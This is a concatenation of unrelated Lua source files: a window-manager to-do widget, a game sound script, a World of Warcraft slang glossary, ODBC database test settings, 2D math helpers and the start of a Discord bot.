widget = wibox.container.arcchart
}
local todo_done = wibox.widget{
font = beautiful.font_name .. "bold 14",
markup = "0",
valign = "bottom",
widget = wibox.widget.textbox
}
local todo_total = wibox.widget{
font = beautiful.font_name .. "bold 8",
markup = helpers.colorize_text("/0", beautiful.xcolor8),
valign = "bottom",
widget = wibox.widget.textbox
}
local todo = wibox.widget{
{
todo_text,
nil,
todo_badge,
expand = "none",
layout = wibox.layout.align.horizontal
},
{
{
{
todo_stat,
reflection = {horizontal = true},
widget = wibox.container.mirror
},
{
nil,
{
nil,
{
todo_done,
todo_total,
spacing = dpi(1),
layout = wibox.layout.fixed.horizontal
},
expand = "none",
layout = wibox.layout.align.vertical
},
expand = "none",
layout = wibox.layout.align.horizontal
},
layout = wibox.layout.stack
},
margins = dpi(10),
widget = wibox.container.margin
},
layout = wibox.layout.fixed.vertical
}
awesome.connect_signal("signal::todo", function(total, done, undone)
todo_badge.markup = helpers.colorize_text("-" .. undone, beautiful.xcolor1)
todo_total.markup = helpers.colorize_text("/" .. total, beautiful.xcolor8)
if total == 0 then
todo_badge.visible = false
total = 1
else
todo_badge.visible = true
end
todo_done.markup = done
todo_stat.max_value = total
todo_stat.value = done
end)
return todo
|
local activeSounds = {}
--
-- Threads
--
Citizen.CreateThread(function()
while true do
Citizen.Wait(10)
if next(activeSounds) then
local playerCoordinates = GetEntityCoords(PlayerPedId())
local cameraDirection = getCameraDirection()
SendNUIMessage({
type = 'position',
volume = GetProfileSetting(300),
camera = cameraDirection,
coordinates = {
x = playerCoordinates.x,
y = playerCoordinates.y,
z = playerCoordinates.z,
},
})
for soundId, soundData in pairs(activeSounds) do
if soundData.type == 'entity' then
if NetworkDoesEntityExistWithNetworkId(soundData.netId) then
local entityId = NetworkGetEntityFromNetworkId(soundData.netId)
if entityId and DoesEntityExist(entityId) then
SendNUIMessage({
type = 'soundPosition',
soundId = soundId,
coordinates = convertLocation({ [1] = GetEntityCoords(entityId), }),
})
end
end
end
end
end
end
end)
--
-- Functions
--
function getCameraDirection()
local cameraRotation = GetGameplayCamRot(0)
local radiansZ = (cameraRotation.z * 0.0174532924)
local radiansX = (cameraRotation.x * 0.0174532924)
local xCos = math.abs(math.cos(radiansX))
return {
x = (-math.sin(radiansZ) * xCos),
y = (math.cos(radiansZ) * xCos),
z = math.sin(radiansX),
}
end
function convertLocation(locations)
local retVal = {}
for _, location in pairs(locations) do
if type(location) == 'string' and location == 'self' then
table.insert(retVal, 'self')
end
if type(location) == 'vector3' then
table.insert(retVal, {
x = location.x,
y = location.y,
z = location.z,
})
end
::continue::
end
return retVal
end
function generateUuid()
local template = 'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'
return string.gsub(template, '[xy]', function (c)
local v = (c == 'x') and math.random(0, 0xf) or math.random(8, 0xb)
return string.format('%x', v)
end)
end
--
-- NUI Callbacks
--
RegisterNUICallback('soundEnded', function(data, cb)
cb({})
activeSounds[data.soundId] = nil
end)
--
-- Events
--
RegisterNetEvent('__chHyperSound:play', function(soundId, soundName, isLooped, location, maxDistance)
if not soundId or (type(soundId) == 'number' and soundId <= 0) then
soundId = generateUuid()
end
if type(location) == 'string' then
if location == 'self' then
location = { [1] = 'self', }
else
location = Config.PredefinedLocations[location]
if not location then
return
end
end
end
if type(location) == 'vector3' then
location = {
[1] = location,
}
end
activeSounds[soundId] = {
type = 'location',
}
SendNUIMessage({
type = 'play',
soundId = soundId,
soundName = soundName,
coordinates = convertLocation(location),
maxDistance = maxDistance,
isLooped = isLooped,
})
end)
RegisterNetEvent('__chHyperSound:playOnEntity', function(entityNetId, soundId, soundName, isLooped, maxDistance)
if not soundId or (type(soundId) == 'number' and soundId <= 0) then
soundId = generateUuid()
end
if not NetworkDoesEntityExistWithNetworkId(entityNetId) then
return
end
local entityId = NetworkGetEntityFromNetworkId(entityNetId)
if not entityId or not DoesEntityExist(entityId) then
return
end
activeSounds[soundId] = {
type = 'entity',
netId = entityNetId,
}
SendNUIMessage({
type = 'play',
soundId = soundId,
soundName = soundName,
coordinates = convertLocation({ [1] = GetEntityCoords(entityId), }),
maxDistance = maxDistance,
isLooped = isLooped,
})
end)
RegisterNetEvent('__chHyperSound:stop', function(soundId)
SendNUIMessage({
type = 'stop',
soundId = soundId,
})
end) |
--[[
Author : Shyam "Doggan" Guthikonda
Modified : 11.19.07
Desc : The main data source.
--]]
-- The dictionary. Add entries here. They don't have to be in alphabetical order, but
-- keeping it as such allows for easier maintenance.
WoWSlang_dict = {
["<3"] = "Love (it looks like a heart).",
["AB"] = "Arathi Basin",
["Add"] = "A monster that joins a battle after it has started. Multiple adds drag a battle out and make it much more difficult, as it gives players no chance to rest and prepare between fights. Often, adds come from patrols.",
["Addon"] = "A patch you add to the game. A patch you add to the game. A patch you add to the game. A patch you add to the game. A patch you add to the game. A patch you add to the game. ",
["AFAIK"] = "As Far As I Know",
["AFK"] = "Away From Keyboard - A player who does not type or use the mouse for a five minutes is automatically flagged as AFK.",
["Aggro"] = "Aggravation - Called 'threat' by Blizzard. Every monster has what players call an 'aggro radius,' an area within which monsters will attack players. The higher the level of the player compared to the monster, the smaller the radius. In addition, players can 'draw aggro' with a monster by dealing more damage than other players or healing players particularly well. Drawing aggro will result in the monster attacking the player. Tanks are expected to draw aggro very well.",
["AH"] = "Auction House - Found in every major city on Azeroth. Each faction has their own auction system, which is identical, no matter which city it is used from. In addition, there is an interfaction auction system, accessible from the neutral cities: Booty Bay, Everlook, and Gadgetzan.",
["alt"] = "Alternate Character - Because of the large number of characters that a player can create on each server, it is common for a player to have several lower-level characters that they do not play as often as their main character.",
["AoE"] = "Area of Effect - A spell that affects targets in an area around the caster, rather than a single target chosen by the caster. Area of Effect spells are most useful when a caster has to deal with multiple monsters.",
["AV"] = "Alterac Valley",
["BB"] = "Booty Bay",
["bc"] = "because...",
["BFD"] = "Blackfathom Deeps",
["BG"] = "Battlegrounds - Battlegrounds were added by Blizzard in order to give players a good environment to compete against the other faction.",
["BoE"] = "Bind on Equip - Items which bind on equip become soulbound to a character the first time that they are equipped, and can never be given to another player afterwards. Until they are equipped, they may be sold to, traded to, or given to another player.",
["BoP"] = "Bind on Pickup - Items which bind on pickup become soulbound to a character as soon as they enter that character's inventory. They can never be given to another player.",
["BRB"] = "Be Right Back",
["BRD"] = "Blackrock Depths",
["BS"] = "Blacksmith - A profession that allows a character to make weapons, mail armor, and plate armor. Blacksmiths can specialize in armosmithing, swordsmithing, axesmithing, or macesmithing.",
["buff"] = "A positive spell or effect on a player. Buffs appear to the left of the minimap, and can be dismissed from the player with a right-click on the buff's icon.",
["BUR"] = "To speakers of Orcish, 'lol' will appear as 'bur' when it is spoken in Common.",
["BWL"] = "Blackwing Lair",
["Cath"] = "Cathedral - One of the 4 sections of Scarlet Monastery",
["CBA"] = "Can't Be Asked",
["cd"] = "cooldown",
["CR"] = "Cenarion Rainment",
["creep"] = "Any enemy (same as 'mob').",
["ct"] = "cooldown timer",
["DE"] = "Disenchant - Enchanters can disenchant items of uncommon (green) quality or better, which destroys the item and produces magical dusts, essences, and shards, which are used to put enchantments on equipment.",
["ding"] = "It is customary for a player who gains a level to announce it to their group and guild by saying 'ding!' Players usually respond with some abbreviation 'congratulations.' Because of this custom, the act of gaining a level is frequently referred to as 'dinging.'",
["DKP"] = "Dragon Kill Point - A system for managing loot distribution in raids. Players participating in the raid are granted points, which can be spent to bid on items they want.",
["DM"] = "Dire Maul or Deadmines",
["DND"] = "Do Not Disturb",
["DPS"] = "Damage Per Second - The average amount of damage that a player deals. Because certain classes are particularly good at having a high rate of DPS, players specialized in this are often referred to as DPSs by players putting together groups.",
["EF"] = "Earthfury",
["EPL"] = "Eastern Plaguelands",
["EQ"] = "EverQuest - Another popular massively multiplayer game, and one which many WoW players currently or formerly played.",
["Farming"] = "Farming is the act of staying in one area and performing the same task repeatedly for extended periods of time. This might be killing the same monsters or gathering the same resources.",
["FP"] = "Flight Path/Point - Refers to either a taxi route (hired winged mount) between two places, or the location of the taxi master.",
["FR"] = "Fire Resistance",
["FTR"] = "For the record",
["FTW"] = "For the Win - Used to cheer on factions or concepts: 'Horde FTW!' or 'Pallies FTW!' indicate that the player wants the Horde or Paladins to succeed. Compare against FTL, 'For The Loss.'",
["gank"] = "gank kill - Ganking is the act of attacking a player who is unable to defend themselves, whether because they are of substantially lower level, they are already in combat with a monster or another player, or because you attack them with a group of people.",
["GM"] = "Game Master / Guild Master",
["GTFO"] = "Get The F*ck Out",
["Gief"] = "Give me",
["gj"] = "Good job",
["gl"] = "Good luck",
["GM"] = "Game Master - A Blizzard employee tasked with observing players, enforcing Blizzard's Terms of Service and responding to help requests from players.",
["Gnomer"] = "Gnomeregan",
["GS"] = "Giantstalker",
["GY"] = "Graveyard - The location your ghost spawns when you die. (Also one of the 4 sections of Scarlet Monastery).",
["GZ"] = "Congratulations (Gratz)",
["hf"] = "Have Fun",
["HK"] = "Honorable Kill - An honorable kill earns a player honor, which can lead to promotions. Honorable kills result from killing members of the opposite faction within a reasonable level range of the player. Killing people far below the player's level are dishonorable kills, and cause the player to lose honor.",
["HP"] = "Health Points / Hit Points - the health of a character. If a character runs out of health points, they die.",
["IDD"] = "Indeed",
["IF"] = "Ironforge",
["IMO"] = "In My Opinion",
["IMHO"] = "In my honest/humble opinion.",
["JC"] = "Jewelcrafter - Jewelcrafting is a profession that allows a character to make rings, necklaces, trinkets, some weapons, and at high levels, cut raw gems so that they can be inserted into socketed items to give bonuses to the wearer.",
["KEK"] = "To speakers of Common, 'lol' will appear as 'kek' when it is spoken in Orcish.",
["kiting"] = "The act of attacking an enemy with projectiles, while slowing it and remaining out of its reach in order to prevent it from attacking the player. Proper kiting can allow players to kill powerful monsters without taking any damage.",
["kk"] = "ok (K)",
["L2"] = "Learn to",
["L2P"] = "Learn to Play",
["LBRS"] = "Lower Blackrock Spire",
["LF"] = "Looking For",
["LFG"] = "Looking For Group - Shorthand used when trying to organize a group in the Group channel, or other substitute channels. Usually follows or is followed by information about the character (class, level) and where the player wants to go with a group. Also used to refer to the group channel itself.",
["LFM"] = "Looking For Members / Looking For More - This (as compared to LFG) indicates that the player has already started to put together a group. Usually follows or is followed by information about the composition of the group and where it will be going. Sometimes players insert a number, as in LF2M: 'looking for 2 more.'",
["LMAO"] = "Laughing My A$$ Off",
["lock"] = "Warlock - This shorthand is frequently used by players trying to organize a group.",
["LOL"] = "Laugh Out Loud (kek)",
["lvl"] = "Level",
["main"] = "main character - The character that a player plays most frequently (not an 'alt').",
["Mara"] = "Maraudon",
["MC"] = "Molten Core",
["MH"] = "Menethil Harbor",
["MMOG"] = "Massively Multiplayer Game",
["MMORPG"] = "Massive Multiplayer Online Role-Playing Game",
["mob"] = "Mobile - Any enemy (same as 'creep').",
["mod"] = "Modification to your interface",
["MoTW"] = "Mark of the Wild (druid buff)",
["MT"] = "Mistell - A mistell is when a player accidentally sends a message to the wrong player or chat channel. Simply saying 'MT' is used to explain a statement that a player made in chat, usually nonsensical or offensive.",
["n1"] = "Nice one",
["NE"] = "Night Elf",
["ninja"] = "A player who steals items or resources that they do not deserve. For example, if another player is trying to kill a group of monsters to get to a chest, another player who walks up and empties the chest, safe from the distracted monsters, would be a ninja. Also refers to players who take items that they don't need in a group situation. 'Ninjaing' is considered a serious offense.",
["N00B"] = "Newbie (nub - naab - newb - noob)",
["NOPE"] = "No (nopz - nah - nty)",
["NP"] = "No Problem",
["NPC"] = "Non-Player Character - An entity controlled by the computer (opposite of 'PC').",
["OMG"] = "Oh My God (OMFG)",
["OMW"] = "On My Way",
["OOM"] = "Out of Mana",
["Org"] = "Orgrimmar",
["OP"] = "Over Powered",
["pally"] = "Paladin",
["pat"] = "patrol - A patrol is a monster or group of monsters wandering back and forth along a set path. Because the majority of monsters do not wander much (if at all), a patrol can catch a player or group unawares. A difficult fight in a dungeon can turn impossible if it is joined by another group of monsters.",
["PC"] = "Player Character - An entity controlled by a player (oppositve of 'NPC').",
["PK"] = "Player Kill - A player kills another player.",
["PLZ"] = "Please (plx)",
["port"] = "portal - A mage ability that allows portals to be opened to major cities. Frequently used to transport a group out of a dungeon once it has been completed. Because the portal spell requires a special reagent, it is not uncommon for mages to offer portals as a paid service to other players.",
["PST"] = "Please Send Tell - A request for players to respond by private message.",
["Premades"] = "A raid or group made prior to the battle.",
["proc"] = "Programmed Random OCcurrence - Many high-quality weapons and armor have special abilities that are randomly activated under the right circumstances; for example, a sword that occasionally engulfs enemies in flames. When this effect occurs, it is said that the item has 'procced.' Items which do so often are said to have high 'proc rates.'",
["PUG"] = "Pickup Group - A pickup group is usually one put together from players who respond to a request in the group channel or asked at random, as compared to a group organized within a guild.",
["pull"] = "Pulling a monster involves attracting its attention and drawing it away from its normal location. This may be done so that a player or group can eliminate one enemy at a time, so that enemies can be drawn out of the threat radius of an incoming patrol, so that a particularly strong monster can be singled out, or many other reasons.",
["PvE"] = "Player versus Environment - In PvE play, players focus on killing computer-controlled enemies and completing quests, rather than competing against other players. Some servers are specifically PvE.",
["PvP"] = "Player versus Player - In PvP play, players focus on competing with other players. Some servers are specifically PvP. On other servers, players must specifically 'flag' themselves for PvP combat before members of the opposite faction can attack them. On PvP servers, players are constantly flagged.",
["QFT"] = "Quoted for Truth - meaning 'I Agree'",
["RDY"] = "Ready (R - RD)",
["red"] = "The other side. So called because the enemy faction's names will appear in red, while the friendly faction's names appear in blue.",
["repop"] = "Repopulate - identical to 'respawn'",
["respawn"] = "Monsters are on timers that cause them to reappear a set time after they die. This can range from minutes to days, depending on the monster.",
["res"] = "Resurrect - Players who are killed can come back to life in several ways, including finding their corpse, speaking to a Spirit Healer, or being resurrected by another player. Only priests, druids, shamans, paladins, and engineers (using Goblin Jumper Cables) can resurrect other players.",
["rez"] = "Resurrect - (see: 'res').",
["RFC"] = "Ragefire Chasm",
["RFD"] = "Razorfen Downs",
["RFK"] = "Razorfen Kraul",
["ROFL"] = "Rolling On the Floor Laughing",
["rouge"] = "Rogue - a common mispelling of 'rogue'.",
["RP"] = "Roleplaying - In roleplaying, players attempt to immerse themselves in the game world. They have their character speak authentically, profess worldviews and beliefs that their character would have, and in other ways try to act realistically for their role.",
["sap"] = "A rogue ability that stuns a humanoid enemy for an extended period of time (30 seconds or more, depending on the rogue's skill). Because this can only be used on enemies who aren't in battle, and it will attract the attention of nearby monsters, sapping is used as an opening in many group fights with multiple monsters.",
["Scholo"] = "Scholomance",
["SFK"] = "Shadowfang Keep",
["shammy"] = "Shaman",
["sheep"] = "A mage ability (technically called 'polymorph') that turns an enemy into a sheep, preventing them from using any abilities, but greatly increasing their health regeneration. Used to remove foes from battle and control the difficulty of fights.",
["SM"] = "Scarlet Monastery",
["SP"] = "Spelling",
["spawn"] = "To be 'born' into the world. When a monster is killed, it will 're-spawn' into the world after a certain time duration.",
["spec"] = "specialization - Starting at level 10, every level that a player reaches will earn them a talent point. Talent points can be invested into talent trees (unique to their class), which improve abilities and powers and teach new ones.",
["squishy"] = "A priest, mage, or warlock. These classes can only wear cloth armor, which provides minimal protection from physical damage. In a group, it is the job of the tank to protect the cloth-wearers.",
["SR"] = "Stormrage",
["SS"] = "Soul Shard or Soulstone - Soul shards are created by warlocks from the souls of defeated enemies by using an ability as the target dies. They are then used as reagents in spells that the warlock casts. A warlock ability called 'soulstoning' allows a player in the group to resurrect themselves after dying.",
["ST"] = "Sunken Temple of Atal'Hakkar",
["STFU"] = "Shut The F*ck Up",
["Strat(h)"] = "Stratholme",
["STV"] = "Stranglethorn Vale",
["summon"] = "A warlock ability that brings a player to the warlock from anywhere in the world. The spell requires the aid of two other players, both of whom (and the player being summoned) must be in a group together. The summonee is given the option of accepting or rejecting the summons. The spell is frequently used to bring a group together more quickly.",
["SW"] = "Stormwind City",
["tank"] = "A tank is a character or pet who can take a lot of damage. Tanks are most frequently warriors, paladins, or Voidwalkers. In a group, it is the tank's job to keep monsters' attention focused on herself, to quickly distract monsters attacking weaker party members (especially healers) and, if need be, to sacrifice herself to save the healer's life.",
["TB"] = "Thunder Bluff",
["TBH"] = "To Be Honest",
["thx"] = "Thanks",
["TS/10S"] = "Ten Storms",
["ty"] = "Thank You",
["UBRS"] = "Upper Blackrock Spire",
["UC"] = "Undercity",
["UD Strat"] = "The Undead (Scourge) section of Stratholme",
["Ulda"] = "Uldaman",
["VC"] = "Edwin VanCleef - The final boss of the Deadmines. Often used to refer to the dungeon itself (to avoid confusion with DM for Dire Maul).",
["vendor trash"] = "Items whose names are gray are of the poorest possible quality. They are considered to be useful for nothing other than selling to vendors.",
["WC"] = "Wailing Caverns",
["wipe"] = "A group wipes when everybody in the party dies. Wiping in a dungeon can be especially bad, as monsters start reappearing after a set time. If the group enters the dungeon again to find that the monsters at the beginning are back, they will effectively have to start over.",
["WoW"] = "World of Warcraft",
["WPL"] = "Western Plaguelands",
["WSG"] = "Warsong Gulch",
["WTB"] = "Want To Buy",
["WTC"] = "Want To Craft",
["WTF"] = "What The F*ck",
["WTS"] = "Want To Sell",
["WTT"] = "Want To Trade",
["XR"] = "the Crossroads",
["y"] = "Yes or Why? (depending on the sentence).",
["yw"] = "You're Welcome",
["Zep"] = "Zeppelin",
["ZF"] = "Zul'Farrak",
["ZG"] = "Zul'Gurub"
}; |
local prompt = require('prompt')(require('pretty-print'))
local exec = require('exec')
local log = require('log').log
-- Takes a time struct with a date and time in UTC and converts it into
-- seconds since Unix epoch (0:00 1 Jan 1970 UTC).
-- Trickier than you'd think because os.time assumes the struct is in local time.
local function getdate()
local t_secs = os.time() -- get seconds if t was in local time.
local t = os.date("*t", t_secs) -- find out if daylight savings was applied.
local t_UTC = os.date("!*t", t_secs) -- find out what UTC t was converted to.
t_UTC.isdst = t.isdst -- apply DST to this time if necessary.
local UTC_secs = os.time(t_UTC) -- find out the converted time in seconds.
return {
seconds = t_secs,
offset = os.difftime(t_secs, UTC_secs) / 60
}
end
-- helper for running command line tools
local function run(...)
local stdout, stderr, code, signal = exec(...)
if code == 0 and signal == 0 then
return string.gsub(stdout, "%s*$", "")
else
return nil, string.gsub(stderr, "%s*$", "")
end
end
-- a wrapper around prompt to show a confirm message
local function confirm(message)
local res = prompt(message .. " (y/n)")
return res and res:find("y")
end
local defaultName = run('whoami')
local defaultSystem = run('uname', '-s')
print(getdate().seconds)
local name = prompt('Your Name', defaultName)
local system = prompt('Your System Type', defaultSystem)
print(name, system)
-- print blank line
print()
-- everything is great
log("done", "success", "success")
os.exit(0)
-- everything is terrible
-- log("fail", "mock error event", "failure")
-- os.exit(-1) |
local infinity_inserter = {}
function infinity_inserter.snap(entity)
local control = entity.get_control_behavior()
if not control then
-- this is a new inserter, so set control mode to blacklist by default
entity.inserter_filter_mode = "blacklist"
end
end
return infinity_inserter
|
dofile("test_setup.lua")
local file1 = [=[
local iter = 0
return {
f1 = function()
iter = iter + 1
return iter
end,
f2 = function()
log("f2 called, which uses global log")
iter = iter + 1
return iter
end
}
]=]
local file2 = [=[
local iter = 0
local const = 0
return {
setConst = function(value)
const = value
end,
f1 = function()
iter = iter + 2
return iter, const
end,
f2 = function()
log("f2 called, which uses global log")
iter = iter + 2
return iter, const
end
}
]=]
local t = DoFileString(file1)
assert(t.f1() == 1)
assert(t.f1() == 2)
assert(t.f2() == 3)
assert(t.f2() == 4)
ReloadFileString(file2)
AssertCall({6, 0}, t.f1())
AssertCall({8, 0}, t.f2())
t.setConst(10)
AssertCall({10, 10}, t.f2())
AssertCall({12, 10}, t.f1())
|
IS_WINDOWS = (require"package".config:sub(1,1) == '\\')
local function export(t, d)
d = d or _G
for k,v in pairs(t) do d[k] = v end
return d
end
DEFINITION_STRING_TYPE_NAME = 'varchar(50)'
QUERYING_STRING_TYPE_NAME = 'string'
TEST_TABLE_NAME = 'odbc_test_dbt'
TEST_PROC_NAME = 'odbc_test_dbsp'
TOTAL_FIELDS = 40
local SYBASE9 = {
DBMS = "ASA";
CNN_DRV = {
{Driver='{Adaptive Server Anywhere 9.0}'};
{UID='TestUser'};
{PWD='sql'};
{EngineName='DevelopServer'};
{DatabaseName='EmptyDB'};
{CommLinks='tcpip{host=127.0.0.1}'};
};
CNN_DSN = {'emptydb', 'TestUser', 'sql'};
CREATE_TABLE_RETURN_VALUE = -1;
DROP_TABLE_RETURN_VALUE = -1;
UPDATE_RETURN_ROWS = true;
PROC_SUPPORT_DEFAULT = true;
HAS_GUID_TYPE = true;
TEST_PROC_CREATE = [[CREATE PROCEDURE ]] .. TEST_PROC_NAME .. [[(
in inIntVal integer,
in inUIntVal unsigned integer,
in inDoubleVal double,
in inStringVal char(50),
in inBinaryVal binary(50),
in inDateVal date,
in inNullVal integer,
in inBitVal bit,
in inGuidVal uniqueidentifier,
in inBigInt bigint,
in inDefaultVal integer default 1234
)
BEGIN
select
inIntVal,
inUIntVal,
inDoubleVal,
inStringVal,
inBinaryVal,
inDateVal,
inNullVal,
inBitVal,
inGuidVal,
inBigInt,
inDefaultVal
END]];
TEST_PROC_DROP = "DROP PROCEDURE " .. TEST_PROC_NAME;
TEST_PROC_CALL = [[CALL ]] .. TEST_PROC_NAME .. [[(
inIntVal=?,
inUIntVal=?,
inDoubleVal=?,
inStringVal=?,
inBinaryVal=?,
inDateVal=?,
inNullVal=?,
inBitVal=?,
inGuidVal=?,
inBigInt=?,
inDefaultVal=?
)]];
}
local SYBASE12 = export(SYBASE9, {}) do
SYBASE12.CNN_DRV = {
{Driver='{SQL Anywhere 12}'};
{UID='DBA'};
{PWD='sql'};
{EngineName='EmptyDB'};
{DatabaseName='EmptyDB'};
{CommLinks='tcpip{host=127.0.0.1}'};
}
SYBASE12.CNN_DSN = {'emptydb', 'DBA', 'sql'}
end
local MSSQL = {
DBMS = "MSSQL";
CNN_DRV = {
{Driver='{SQL Server Native Client 10.0}'};
{Server='127.0.0.1,1443'};
{Database='testdb'};
{Uid='sa'};
{Pwd='sql'};
};
CNN_DSN = {'luasql-test', 'sa', 'sql'};
CREATE_TABLE_RETURN_VALUE = -1;
DROP_TABLE_RETURN_VALUE = -1;
UPDATE_RETURN_ROWS = true;
}
local MySQL = {
DBMS = "MySQL";
CNN_DRV = {
{Driver = IS_WINDOWS and '{MySQL ODBC 5.2 ANSI Driver}' or 'MySQL'};
{db='test'};
{uid='root'};
};
CNN_DSN = {'MySQL-test', 'root', ''};
CREATE_TABLE_RETURN_VALUE = 0;
DROP_TABLE_RETURN_VALUE = 0;
UPDATE_RETURN_ROWS = false;
PROC_SUPPORT_DEFAULT = false;
HAS_GUID_TYPE = false;
TEST_PROC_CREATE = [[CREATE DEFINER=CURRENT_USER PROCEDURE ]] .. TEST_PROC_NAME .. [[(
in inIntVal integer,
in inUIntVal int unsigned,
in inDoubleVal double,
in inStringVal char(50),
in inBinaryVal binary(50),
in inDateVal date,
in inNullVal integer,
in inBitVal bit(1),
in inBigInt bigint
)
BEGIN
select
inIntVal,
inUIntVal,
inDoubleVal,
inStringVal,
inBinaryVal,
inDateVal,
inNullVal,
inBitVal,
inBigInt;
END]];
TEST_PROC_DROP = 'DROP PROCEDURE ' .. TEST_PROC_NAME;
TEST_PROC_CALL = 'CALL ' .. TEST_PROC_NAME .. '(?, ?, ?, ?, ?, ?, ?, ?, ?)';
TEST_PROC_CREATE_MULTI_RS = [[CREATE DEFINER=CURRENT_USER PROCEDURE ]] .. TEST_PROC_NAME .. [[()
BEGIN
select 1 as IntVal1, 2 as IntVal2
union all
select 11, 12;
select 'hello' as StrVal1, 'world' as StrVal2, '!!!' as StrVal3
union all
select 'some', 'other', 'row';
END]];
TEST_PROC_CALL_MULTI_RS = 'CALL ' .. TEST_PROC_NAME .. '()'
}
local PgSQL = {
DBMS = "PgSQL";
CNN_DRV = {
{Driver = IS_WINDOWS and '{PostgreSQL ODBC Driver(ANSI)}' or 'PostgreSQL ANSI'};
{Server='localhost'};
{Port='5432'};
{Database='test'};
{Uid='postgres'};
-- {Pwd=myPassword};
};
CNN_DSN = {'PgSQL-test', 'postgres', ''};
CREATE_TABLE_RETURN_VALUE = 0;
DROP_TABLE_RETURN_VALUE = IS_WINDOWS and 0 or -1;
UPDATE_RETURN_ROWS = false;
-- odbc Driver does not support set default as indicator
-- but allow only omit this arg i query
PROC_SUPPORT_DEFAULT = false;
HAS_GUID_TYPE = true;
TEST_PROC_CREATE = [[CREATE OR REPLACE FUNCTION ]] .. TEST_PROC_NAME .. [[(
in inIntVal integer,
in inUIntVal bigint,
in inDoubleVal double precision,
in inStringVal text,
in inBinaryVal bytea,
in inDateVal date,
in inNullVal integer,
in inBitVal bit,
in inGuidVal uuid,
in inBigInt bigint,
in inDefaultVal integer default 1234
)
RETURNS TABLE(
inIntVal integer,
inUIntVal bigint,
inDoubleVal double precision,
inStringVal text,
inBinaryVal bytea,
inDateVal date,
inNullVal integer,
inBitVal bit,
inGuidVal uuid,
inBigInt bigint,
inDefaultVal integer
)
AS $$
select
inIntVal,
inUIntVal,
inDoubleVal,
inStringVal,
inBinaryVal,
inDateVal,
inNullVal,
inBitVal,
inGuidVal,
inBigInt,
inDefaultVal
$$
LANGUAGE SQL;
]];
TEST_PROC_DROP = 'DROP FUNCTION IF EXISTS ' .. TEST_PROC_NAME .. [[(
in inIntVal integer,
in inUIntVal bigint,
in inDoubleVal double precision,
in inStringVal text,
in inBinaryVal bytea,
in inDateVal date,
in inNullVal integer,
in inBitVal bit,
in inGuidVal uuid,
in inBigInt bigint,
in inDefaultVal integer
)]];
TEST_PROC_CALL = 'select * from ' .. TEST_PROC_NAME .. [[(
cast(? as integer),
cast(? as bigint),
cast(? as double precision),
cast(? as text),
cast(? as bytea),
cast(? as date),
cast(? as integer),
cast(? as bit),
cast(? as uuid),
cast(? as bigint)
)
]];
BIT_LUA_TYPE = 'string',
BIT_LUA_TRUE = '1',
GUID_USE_DASH = true
}
local VARS = {
pgsql = PgSQL;
mysql = MySQL;
asa9 = SYBASE9;
asa12 = SYBASE12;
mssql = MSSQL;
}
local v = (require"os".getenv("LUAODBC_TEST_DBMS") or 'asa9'):lower()
export(
(assert(VARS[v], 'unknown DBMS: ' .. v))
)
BIT_LUA_TYPE = BIT_LUA_TYPE or 'boolean'
BIT_LUA_TRUE = BIT_LUA_TRUE or true
|
local acos = math.acos
local cos = math.cos
local max = math.max
local min = math.min
local remove = table.remove
local sin = math.sin
local sqrt = math.sqrt
local function sign(x)
return x < 0 and -1 or 1
end
-- http://frederic-wang.fr/decomposition-of-2d-transform-matrices.html
local function decompose2(transform)
local t11, t12, t13, t14,
t21, t22, t23, t24,
t31, t32, t33, t34,
t41, t42, t43, t44 = transform:getMatrix()
local x = t14
local y = t24
local angle = 0
local scaleX = t11 * t11 + t21 * t21
local scaleY = t12 * t12 + t22 * t22
local shearX = 0
local shearY = 0
if scaleX + scaleY ~= 0 then
local det = t11 * t22 - t12 * t21
if scaleX >= scaleY then
shearX = (t11 * t12 + t21 * t22) / scaleX
scaleX = sqrt(scaleX)
angle = sign(t21) * acos(t11 / scaleX)
scaleY = det / scaleX
else
shearY = (t11 * t12 + t21 * t22) / scaleY
scaleY = sqrt(scaleY)
angle = 0.5 * pi - sign(t22) * acos(-t12 / scaleY)
scaleX = det / scaleY
end
end
return x, y, angle, scaleX, scaleY, 0, 0, shearX, shearY
end
local function normalize2(x, y)
local length = sqrt(x * x + y * y)
return x / length, y / length, length
end
local function removeLast(t, v)
for i = #t, 1, -1 do
if t[i] == v then
remove(t, i)
return i
end
end
return nil
end
local function transformVector(transform, x, y)
local x1, y1 = transform:transformPoint(0, 0)
local x2, y2 = transform:transformPoint(x, y)
return x2 - x1, y2 - y1
end
local function mixTransforms(a, b, t, c)
local a11, a12, a13, a14,
a21, a22, a23, a24,
a31, a32, a33, a34,
a41, a42, a43, a44 = a:getMatrix()
local b11, b12, b13, b14,
b21, b22, b23, b24,
b31, b32, b33, b34,
b41, b42, b43, b44 = b:getMatrix()
local s = 1 - t
local c11 = s * a11 + t * b11
local c12 = s * a12 + t * b12
local c13 = s * a13 + t * b13
local c14 = s * a14 + t * b14
local c21 = s * a21 + t * b21
local c22 = s * a22 + t * b22
local c23 = s * a23 + t * b23
local c24 = s * a24 + t * b24
local c31 = s * a31 + t * b31
local c32 = s * a32 + t * b32
local c33 = s * a33 + t * b33
local c34 = s * a34 + t * b34
local c41 = s * a41 + t * b41
local c42 = s * a42 + t * b42
local c43 = s * a43 + t * b43
local c44 = s * a44 + t * b44
c = c or love.math.newTransform()
c:setMatrix(
c11, c12, c13, c14,
c21, c22, c23, c24,
c31, c32, c33, c34,
c41, c42, c43, c44)
return c, c34
end
local function length2(x, y)
return sqrt(x * x + y * y)
end
local function distance2(x1, y1, x2, y2)
return sqrt((x2 - x1) * (x2 - x1) + (y2 - y1) * (y2 - y1))
end
local function mix(x1, x2, t)
return (1 - t) * x1 + t * x2
end
local function clamp(x, x1, x2)
return min(max(x, x1), x2)
end
local function dot2(x1, y1, x2, y2)
return x1 * x2 + y1 * y2
end
local function rotate2(x, y, angle)
local cosAngle = cos(angle)
local sinAngle = sin(angle)
return cosAngle * x - sinAngle * y, sinAngle * x + cosAngle * y
end
return {
clamp = clamp,
decompose2 = decompose2,
distance2 = distance2,
dot2 = dot2,
length2 = length2,
mix = mix,
mixTransforms = mixTransforms,
normalize2 = normalize2,
removeLast = removeLast,
rotate2 = rotate2,
sign = sign,
transformVector = transformVector,
}
|
-- dependencies
local json = require('json')
local discordia = require('discordia')
local client = discordia.Client()
storyServerID = "784167695372779561"
storyChannelID = "784644349879255080"
chapterSubtitle = "𝒞𝒽𝒶𝓅𝓉𝑒𝓇"
charLimit = 1000
wipe = false
post = true
-- storyChannel:send{embed = chapter}
client:on('ready', function()
-- client.user is the path for your bot
print('Logged in as '.. client.user.username)
local storyChannel = client:getChannel(storyChannelID)
